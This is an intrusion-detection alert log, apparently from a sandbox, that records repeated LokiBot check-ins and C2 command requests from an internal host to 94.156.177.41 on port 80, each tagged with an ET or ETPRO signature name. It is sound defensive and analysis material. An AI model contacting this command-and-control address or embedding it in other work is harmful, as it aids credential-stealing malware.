2024-11-22T17:39:16.481024+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49814	94.156.177.41	80	TCP
2024-11-22T17:39:16.481024+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49814	94.156.177.41	80	TCP
2024-11-22T17:39:16.600800+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49814	TCP
2024-11-22T17:39:16.873576+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49820	94.156.177.41	80	TCP
2024-11-22T17:39:16.873576+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49820	94.156.177.41	80	TCP
2024-11-22T17:39:16.873576+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49820	94.156.177.41	80	TCP
2024-11-22T17:39:18.289205+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49820	94.156.177.41	80	TCP
2024-11-22T17:39:18.289205+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49820	94.156.177.41	80	TCP
2024-11-22T17:39:18.412865+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49820	TCP
2024-11-22T17:39:18.772634+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49826	94.156.177.41	80	TCP
2024-11-22T17:39:18.772634+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49826	94.156.177.41	80	TCP
2024-11-22T17:39:18.772634+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49826	94.156.177.41	80	TCP
2024-11-22T17:39:20.131550+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49826	94.156.177.41	80	TCP
2024-11-22T17:39:20.131550+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49826	94.156.177.41	80	TCP
2024-11-22T17:39:20.251127+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49826	TCP
2024-11-22T17:39:20.515914+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49830	94.156.177.41	80	TCP
2024-11-22T17:39:20.515914+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49830	94.156.177.41	80	TCP
2024-11-22T17:39:20.515914+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49830	94.156.177.41	80	TCP
2024-11-22T17:39:21.922262+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49830	94.156.177.41	80	TCP
2024-11-22T17:39:21.922262+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49830	94.156.177.41	80	TCP
2024-11-22T17:39:22.044326+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49830	TCP
2024-11-22T17:39:22.314600+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49834	94.156.177.41	80	TCP
2024-11-22T17:39:22.314600+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49834	94.156.177.41	80	TCP
2024-11-22T17:39:22.314600+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49834	94.156.177.41	80	TCP
2024-11-22T17:39:23.676175+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49834	94.156.177.41	80	TCP
2024-11-22T17:39:23.676175+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49834	94.156.177.41	80	TCP
2024-11-22T17:39:23.796270+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49834	TCP
2024-11-22T17:39:24.067071+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49839	94.156.177.41	80	TCP
2024-11-22T17:39:24.067071+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49839	94.156.177.41	80	TCP
2024-11-22T17:39:24.067071+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49839	94.156.177.41	80	TCP
2024-11-22T17:39:25.302977+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49839	94.156.177.41	80	TCP
2024-11-22T17:39:25.302977+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49839	94.156.177.41	80	TCP
2024-11-22T17:39:25.422629+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49839	TCP
2024-11-22T17:39:25.697513+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49845	94.156.177.41	80	TCP
2024-11-22T17:39:25.697513+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49845	94.156.177.41	80	TCP
2024-11-22T17:39:25.697513+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49845	94.156.177.41	80	TCP
2024-11-22T17:39:27.054176+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49845	94.156.177.41	80	TCP
2024-11-22T17:39:27.054176+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49845	94.156.177.41	80	TCP
2024-11-22T17:39:27.173859+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49845	TCP
2024-11-22T17:39:27.435691+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49851	94.156.177.41	80	TCP
2024-11-22T17:39:27.435691+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49851	94.156.177.41	80	TCP
2024-11-22T17:39:27.435691+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49851	94.156.177.41	80	TCP
2024-11-22T17:39:28.889019+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49851	94.156.177.41	80	TCP
2024-11-22T17:39:28.889019+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49851	94.156.177.41	80	TCP
2024-11-22T17:39:29.008704+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49851	TCP
2024-11-22T17:39:29.277428+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49853	94.156.177.41	80	TCP
2024-11-22T17:39:29.277428+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49853	94.156.177.41	80	TCP
2024-11-22T17:39:29.277428+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49853	94.156.177.41	80	TCP
2024-11-22T17:39:30.602180+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49853	94.156.177.41	80	TCP
2024-11-22T17:39:30.602180+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49853	94.156.177.41	80	TCP
2024-11-22T17:39:30.723332+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49853	TCP
2024-11-22T17:39:30.980502+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49858	94.156.177.41	80	TCP
2024-11-22T17:39:30.980502+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49858	94.156.177.41	80	TCP
2024-11-22T17:39:30.980502+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49858	94.156.177.41	80	TCP
2024-11-22T17:39:32.319975+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49858	94.156.177.41	80	TCP
2024-11-22T17:39:32.319975+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49858	94.156.177.41	80	TCP
2024-11-22T17:39:32.439587+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49858	TCP
2024-11-22T17:39:32.779202+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49864	94.156.177.41	80	TCP
2024-11-22T17:39:32.779202+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49864	94.156.177.41	80	TCP
2024-11-22T17:39:32.779202+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49864	94.156.177.41	80	TCP
2024-11-22T17:39:34.064527+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49864	94.156.177.41	80	TCP
2024-11-22T17:39:34.064527+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49864	94.156.177.41	80	TCP
2024-11-22T17:39:34.184105+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49864	TCP
2024-11-22T17:39:34.454700+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49869	94.156.177.41	80	TCP
2024-11-22T17:39:34.454700+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49869	94.156.177.41	80	TCP
2024-11-22T17:39:34.454700+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49869	94.156.177.41	80	TCP
2024-11-22T17:39:35.909915+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49869	94.156.177.41	80	TCP
2024-11-22T17:39:35.909915+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49869	94.156.177.41	80	TCP
2024-11-22T17:39:36.030123+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49869	TCP
2024-11-22T17:39:36.638264+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49875	94.156.177.41	80	TCP
2024-11-22T17:39:36.638264+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49875	94.156.177.41	80	TCP
2024-11-22T17:39:36.638264+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49875	94.156.177.41	80	TCP
2024-11-22T17:39:37.911435+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49875	94.156.177.41	80	TCP
2024-11-22T17:39:37.911435+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49875	94.156.177.41	80	TCP
2024-11-22T17:39:38.031130+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49875	TCP
2024-11-22T17:39:38.319161+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49878	94.156.177.41	80	TCP
2024-11-22T17:39:38.319161+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49878	94.156.177.41	80	TCP
2024-11-22T17:39:38.319161+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49878	94.156.177.41	80	TCP
2024-11-22T17:39:39.774405+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49878	94.156.177.41	80	TCP
2024-11-22T17:39:39.774405+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49878	94.156.177.41	80	TCP
2024-11-22T17:39:39.893944+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49878	TCP
2024-11-22T17:39:40.156593+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49883	94.156.177.41	80	TCP
2024-11-22T17:39:40.156593+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49883	94.156.177.41	80	TCP
2024-11-22T17:39:40.156593+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49883	94.156.177.41	80	TCP
2024-11-22T17:39:41.435946+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49883	94.156.177.41	80	TCP
2024-11-22T17:39:41.435946+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49883	94.156.177.41	80	TCP
2024-11-22T17:39:41.556669+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49883	TCP
2024-11-22T17:39:41.832002+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49889	94.156.177.41	80	TCP
2024-11-22T17:39:41.832002+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49889	94.156.177.41	80	TCP
2024-11-22T17:39:41.832002+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49889	94.156.177.41	80	TCP
2024-11-22T17:39:43.209941+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49889	94.156.177.41	80	TCP
2024-11-22T17:39:43.209941+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49889	94.156.177.41	80	TCP
2024-11-22T17:39:43.330266+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49889	TCP
2024-11-22T17:39:43.599899+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49894	94.156.177.41	80	TCP
2024-11-22T17:39:43.599899+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49894	94.156.177.41	80	TCP
2024-11-22T17:39:43.599899+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49894	94.156.177.41	80	TCP
2024-11-22T17:39:44.928389+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49894	94.156.177.41	80	TCP
2024-11-22T17:39:44.928389+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49894	94.156.177.41	80	TCP
2024-11-22T17:39:45.051310+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49894	TCP
2024-11-22T17:39:45.307094+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49898	94.156.177.41	80	TCP
2024-11-22T17:39:45.307094+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49898	94.156.177.41	80	TCP
2024-11-22T17:39:45.307094+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49898	94.156.177.41	80	TCP
2024-11-22T17:39:46.764115+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49898	94.156.177.41	80	TCP
2024-11-22T17:39:46.764115+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49898	94.156.177.41	80	TCP
2024-11-22T17:39:46.887092+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49898	TCP
2024-11-22T17:39:47.159997+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49902	94.156.177.41	80	TCP
2024-11-22T17:39:47.159997+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49902	94.156.177.41	80	TCP
2024-11-22T17:39:47.159997+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49902	94.156.177.41	80	TCP
2024-11-22T17:39:48.566331+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49902	94.156.177.41	80	TCP
2024-11-22T17:39:48.566331+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49902	94.156.177.41	80	TCP
2024-11-22T17:39:48.686602+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49902	TCP
2024-11-22T17:39:49.169189+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49907	94.156.177.41	80	TCP
2024-11-22T17:39:49.169189+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49907	94.156.177.41	80	TCP
2024-11-22T17:39:49.169189+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49907	94.156.177.41	80	TCP
2024-11-22T17:39:50.496975+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49907	94.156.177.41	80	TCP
2024-11-22T17:39:50.496975+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49907	94.156.177.41	80	TCP
2024-11-22T17:39:50.616894+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49907	TCP
2024-11-22T17:39:50.892509+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49913	94.156.177.41	80	TCP
2024-11-22T17:39:50.892509+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49913	94.156.177.41	80	TCP
2024-11-22T17:39:50.892509+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49913	94.156.177.41	80	TCP
2024-11-22T17:39:52.341897+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49913	94.156.177.41	80	TCP
2024-11-22T17:39:52.341897+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49913	94.156.177.41	80	TCP
2024-11-22T17:39:52.461465+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49913	TCP
2024-11-22T17:39:52.742489+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49917	94.156.177.41	80	TCP
2024-11-22T17:39:52.742489+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49917	94.156.177.41	80	TCP
2024-11-22T17:39:52.742489+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49917	94.156.177.41	80	TCP
2024-11-22T17:39:54.151907+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49917	94.156.177.41	80	TCP
2024-11-22T17:39:54.151907+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49917	94.156.177.41	80	TCP
2024-11-22T17:39:54.273217+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49917	TCP
2024-11-22T17:39:54.532238+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49922	94.156.177.41	80	TCP
2024-11-22T17:39:54.532238+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49922	94.156.177.41	80	TCP
2024-11-22T17:39:54.532238+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49922	94.156.177.41	80	TCP
2024-11-22T17:39:55.765985+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49922	94.156.177.41	80	TCP
2024-11-22T17:39:55.765985+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49922	94.156.177.41	80	TCP
2024-11-22T17:39:55.885986+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49922	TCP
2024-11-22T17:39:56.154638+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49926	94.156.177.41	80	TCP
2024-11-22T17:39:56.154638+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49926	94.156.177.41	80	TCP
2024-11-22T17:39:56.154638+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49926	94.156.177.41	80	TCP
2024-11-22T17:39:57.517015+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49926	94.156.177.41	80	TCP
2024-11-22T17:39:57.517015+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49926	94.156.177.41	80	TCP
2024-11-22T17:39:57.636701+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49926	TCP
2024-11-22T17:39:57.905221+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49932	94.156.177.41	80	TCP
2024-11-22T17:39:57.905221+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49932	94.156.177.41	80	TCP
2024-11-22T17:39:57.905221+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49932	94.156.177.41	80	TCP
2024-11-22T17:39:59.228879+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49932	94.156.177.41	80	TCP
2024-11-22T17:39:59.228879+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49932	94.156.177.41	80	TCP
2024-11-22T17:39:59.348827+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49932	TCP
2024-11-22T17:39:59.617555+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49937	94.156.177.41	80	TCP
2024-11-22T17:39:59.617555+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49937	94.156.177.41	80	TCP
2024-11-22T17:39:59.617555+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49937	94.156.177.41	80	TCP
2024-11-22T17:40:01.069978+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49937	94.156.177.41	80	TCP
2024-11-22T17:40:01.069978+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49937	94.156.177.41	80	TCP
2024-11-22T17:40:01.189433+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49937	TCP
2024-11-22T17:40:01.461227+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49942	94.156.177.41	80	TCP
2024-11-22T17:40:01.461227+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49942	94.156.177.41	80	TCP
2024-11-22T17:40:01.461227+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49942	94.156.177.41	80	TCP
2024-11-22T17:40:02.745174+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49942	94.156.177.41	80	TCP
2024-11-22T17:40:02.745174+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49942	94.156.177.41	80	TCP
2024-11-22T17:40:02.986093+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49942	TCP
2024-11-22T17:40:03.120405+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49945	94.156.177.41	80	TCP
2024-11-22T17:40:03.120405+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49945	94.156.177.41	80	TCP
2024-11-22T17:40:03.120405+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49945	94.156.177.41	80	TCP
2024-11-22T17:40:04.526328+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49945	94.156.177.41	80	TCP
2024-11-22T17:40:04.526328+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49945	94.156.177.41	80	TCP
2024-11-22T17:40:04.646103+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49945	TCP
2024-11-22T17:40:04.910450+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49951	94.156.177.41	80	TCP
2024-11-22T17:40:04.910450+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49951	94.156.177.41	80	TCP
2024-11-22T17:40:04.910450+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49951	94.156.177.41	80	TCP
2024-11-22T17:40:06.269586+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49951	94.156.177.41	80	TCP
2024-11-22T17:40:06.269586+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49951	94.156.177.41	80	TCP
2024-11-22T17:40:06.389791+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49951	TCP
2024-11-22T17:40:06.653374+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49957	94.156.177.41	80	TCP
2024-11-22T17:40:06.653374+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49957	94.156.177.41	80	TCP
2024-11-22T17:40:06.653374+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49957	94.156.177.41	80	TCP
2024-11-22T17:40:08.104776+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49957	94.156.177.41	80	TCP
2024-11-22T17:40:08.104776+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49957	94.156.177.41	80	TCP
2024-11-22T17:40:08.225755+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49957	TCP
2024-11-22T17:40:08.480379+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49961	94.156.177.41	80	TCP
2024-11-22T17:40:08.480379+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49961	94.156.177.41	80	TCP
2024-11-22T17:40:08.480379+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49961	94.156.177.41	80	TCP
2024-11-22T17:40:09.891749+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49961	94.156.177.41	80	TCP
2024-11-22T17:40:09.891749+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49961	94.156.177.41	80	TCP
2024-11-22T17:40:10.011540+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49961	TCP
2024-11-22T17:40:10.283380+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49965	94.156.177.41	80	TCP
2024-11-22T17:40:10.283380+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49965	94.156.177.41	80	TCP
2024-11-22T17:40:10.283380+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49965	94.156.177.41	80	TCP
2024-11-22T17:40:11.557939+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49965	94.156.177.41	80	TCP
2024-11-22T17:40:11.557939+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49965	94.156.177.41	80	TCP
2024-11-22T17:40:11.677531+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49965	TCP
2024-11-22T17:40:11.940390+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49970	94.156.177.41	80	TCP
2024-11-22T17:40:11.940390+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49970	94.156.177.41	80	TCP
2024-11-22T17:40:11.940390+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49970	94.156.177.41	80	TCP
2024-11-22T17:40:13.394137+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49970	94.156.177.41	80	TCP
2024-11-22T17:40:13.394137+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49970	94.156.177.41	80	TCP
2024-11-22T17:40:13.513836+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49970	TCP
2024-11-22T17:40:13.780404+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49976	94.156.177.41	80	TCP
2024-11-22T17:40:13.780404+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49976	94.156.177.41	80	TCP
2024-11-22T17:40:13.780404+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49976	94.156.177.41	80	TCP
2024-11-22T17:40:15.065652+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49976	94.156.177.41	80	TCP
2024-11-22T17:40:15.065652+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49976	94.156.177.41	80	TCP
2024-11-22T17:40:15.188463+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.4	49976	TCP
2024-11-22T17:40:15.455772+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49981	94.156.177.41	80	TCP
2024-11-22T17:40:15.455772+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49981	94.156.177.41	80	TCP
